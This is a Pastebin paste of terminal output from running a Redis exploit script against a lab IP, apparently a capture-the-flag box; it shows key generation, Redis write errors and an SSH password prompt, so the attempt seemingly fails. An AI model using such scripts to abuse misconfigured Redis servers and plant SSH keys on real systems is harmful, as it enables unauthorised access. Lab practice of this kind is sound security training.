API tools faq
paste
Advertisement
ekarpp

Untitled

ekarpp
Dec 9th, 2019
451
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.53 KB | None | 0 0
raw download clone embed print report
  1. root@kali:~/Downloads/Redis-Server-Exploit# ./redis.py 10.10.10.160 redis
  2. *******************************************************************
  3. * [+] [Exploit] Exploiting misconfigured REDIS SERVER*
  4. * [+] AVINASH KUMAR THAPA aka "-Acid"
  5. *******************************************************************
  6.  
  7.  
  8. SSH Keys Need to be Generated
  9. Generating public/private rsa key pair.
  10. Enter file in which to save the key (/root/.ssh/id_rsa): /root/Downloads/key
  11. Enter passphrase (empty for no passphrase):
  12. Enter same passphrase again:
  13. Your identification has been saved in /root/Downloads/key.
  14. Your public key has been saved in /root/Downloads/key.pub.
  15. The key fingerprint is:
  16. SHA256:Z06l//oIsuXO9RkGm60x/bcVJgo5s9pw1GLguNL097E acid_creative
  17. The key's randomart image is:
  18. +---[RSA 3072]----+
  19. | |
  20. | |
  21. | . . |
  22. | o . oo |
  23. | o .SO=... o |
  24. | o o o=*..*o .|
  25. | . o o.++oB = .|
  26. | . **.ooO +o|
  27. | ..o+E+o=.+|
  28. +----[SHA256]-----+
  29. Keys Generated Successfully
  30. sh: 1: cannot create /root/.ssh/public_key.txt: Directory nonexistent
  31. (error) MISCONF Redis is configured to save RDB snapshots, but it is currently not able to persist on disk. Commands that may modify the data set are disabled, because this instance is configured to report errors during writes if RDB snapshotting fails (stop-writes-on-bgsave-error option). Please check the Redis logs for details about the RDB error.
  32. cat: /root/.ssh/public_key.txt: No such file or directory
  33. (error) MISCONF Redis is configured to save RDB snapshots, but it is currently not able to persist on disk. Commands that may modify the data set are disabled, because this instance is configured to report errors during writes if RDB snapshotting fails (stop-writes-on-bgsave-error option). Please check the Redis logs for details about the RDB error.
  34. OK
  35. (error) ERR Changing directory: Permission denied
  36. OK
  37. (error) ERR
  38. You'll get shell in sometime..Thanks for your patience
  39. Warning: Identity file /root/.ssh/id_rsa not accessible: No such file or directory.
  40. The authenticity of host '10.10.10.160 (10.10.10.160)' can't be established.
  41. ECDSA key fingerprint is SHA256:kea9iwskZTAT66U8yNRQiTa6t35LX8p0jOpTfvgeCh0.
  42. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
  43. Warning: Permanently added '10.10.10.160' (ECDSA) to the list of known hosts.
  44. redis@10.10.10.160's password:
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!